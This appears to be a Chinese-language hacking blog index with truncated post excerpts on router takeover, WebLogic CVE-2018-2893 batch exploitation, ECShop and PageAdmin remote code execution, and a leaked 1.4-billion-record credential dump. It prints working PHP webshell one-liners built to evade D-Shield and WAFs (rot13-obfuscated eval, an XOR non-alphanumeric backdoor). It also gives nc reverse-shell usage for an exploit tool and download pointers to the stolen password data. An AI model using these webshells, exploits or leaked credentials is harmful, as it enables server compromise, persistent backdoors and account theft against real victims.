看我如何利用发现的漏洞接管D-Link路由器

640.webp.jpg

最新免杀一句话

<?php ($sun = $_POST['pass']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($sun)', 'add');?>好吧 应网友需求,刚去做了个过d盾的,其他的没测试<?php$a = chr(92+5);$b&n

能秒99%的waf防火墙

开始详情看这:https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html原谅我见识短,没用过usort函数上面连接的文章中,发现有这个函数于是刚刚了解了下usort函数 usort函数干嘛的?官方介绍:http://php.net/manual/zh/function.usort.php通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调123

CVE-2018-2893批量工具

使用说明:环境 python 2.7批量扫描 7001端口 以 ip:7001放入url.txt运行python CVE-2018-2893-MultiThreading.py 批量检测成功结果在weblogic1_success.txtnc 监听 nc -lvvp 监听端口运行python weblogic.py 成功ip 7001 本机ip 监听端口可反弹shell链接: https://pan.baidu.com/s/11VIjLv_yNaBie9xRpyrI_w 提取码: d2qf

过狗过盾的php一句话(非字母数字的)

代码比较简单,利用php异或(^)非字母数字生成后门,
详细的有关php异或的解释,参考:编写变态的(非字母数字的)PHP后门
文中提到的这种:
<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

php-cgi解析漏洞 绕过云锁拦截

云锁拦截.jpg

asp过狗过最新版本D盾一句话(无意中得到的)

ECShop 2.x 3.0代码执行漏洞分析

0×00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0×01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的user_passport.dwt模板中,随后insert_mod根据模板内容动态执行相应的函数,用户插入恶意代码导致模板动态执行了lib_insert下的 insert_ads 方法,通过SQL注入,返回构造的执行代

pageadmin前台getshell 含漏洞利用工具

漏洞分析<% @ Page language="c#" Inherits="PageAdmin.uploads"%><!DOCTYPE htmlPUBLIC "-//W3C//DTD XHTML 1.0 Transi?onal//EN" "h?p://www.w3.org/TR/xhtml1/DTD/xhtml1-transi?onal.dtd">在uploads文件发现真实代码在pagead

国外14亿泄露数据下载及还原

 2018年6月10日freebuf发布了篇文章《14亿邮箱泄露密码明文信息查询网站惊现网络》,声称其泄露的数据可以通过暗网网站(http://dumpedlqezarfife.onion.lu/)进行查询,后续通过网络获取其泄露文件的下载地址,历经千辛万苦,终于将数据下载到本地,通过研究,将其txt文件进行还原处理,并对其进行无效数据处理,去除空密码等操作。1.1.1数据下载及分析1.数据下载地址(1)二进制未压缩41G磁力下载链接地址magnet:?xt=urn:btih:7ffb